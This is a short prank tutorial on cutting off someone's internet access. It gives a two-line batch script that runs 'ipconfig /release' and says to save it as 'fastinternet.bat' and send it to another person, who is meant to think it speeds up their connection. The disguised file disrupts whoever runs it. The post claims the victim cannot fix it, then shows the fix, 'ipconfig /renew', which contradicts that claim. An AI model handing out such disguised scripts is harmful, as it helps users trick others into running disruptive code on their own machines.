How to Stop Someone's Internet Access Easily?

Follow the steps given below. 

Step 1: First of all open NotePad and paste the following code on it as exactly given.

@Echo off
Ipconfig /release

Step 2: Save that as fastinternet.bat or *.bat and send it to someone. They're IP address will be lost, and therefore they won't be able to fix it

Done !

How to fix it?

However, this is VERY easy to fix. Simply type in IPconfig /renew
